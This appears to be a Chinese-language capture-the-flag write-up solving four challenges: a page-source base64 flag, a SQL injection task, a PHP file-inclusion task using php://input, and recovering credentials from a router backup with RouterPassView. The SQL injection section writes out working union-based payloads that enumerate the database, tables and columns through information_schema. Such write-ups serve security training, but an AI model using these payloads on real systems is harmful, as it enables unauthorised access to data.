web签到题
打开得到以上,f12找到相关线索
base64解码得到flag
web2
得到注入点,万能密码尝试注入:
登入成功,发现该网站属于单引号字符型注入
开始查询:admin' or 1=1 union select 1,2,3#
找到数据库的库名:admin' or 1=1 union select 1,database(),3#
得到web2,
继续查询:a' union select 1,(select group_concat(table_name) from information_schema.tables
where table_schema='web2'),3 #
接下来获取flag表的字段:
a' union select 1,
(select group_concat(column_name) from information_schema.columns
where table_schema='web2' and table_name='flag')
,3 #
得到回显flag
接下来获取flag表的数据:a' union select 1,(select flag from flag),3 #
得到flag
web3
打开得到:
明显的一个文件包含漏洞。
bp抓包,用php://input(可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。)协议尝试绕过。
这里运用input协议将下面的post 传的php语句
得到:一个链接直接打开:
得到flag。
荷兰宽带数据泄露
打开发现是一个格式为
.bin
的东西,与题目名联系起来尝试使用RouterPassView打开
知识点:路由器的备份文件通常包含了像ISP的用户名重要数据/密码、路由器的登录密码,是无线网络的关键。如果不小心失去了这些密码/钥匙,也可以通过路由器配置的备份文件找回。RouterPassView就是一个找回路由器密码的工具,可以帮助你从路由器中恢复丢失的密码。
结合知识点尝试将搜索出的username和password分别带入flag中尝试发现flag是username。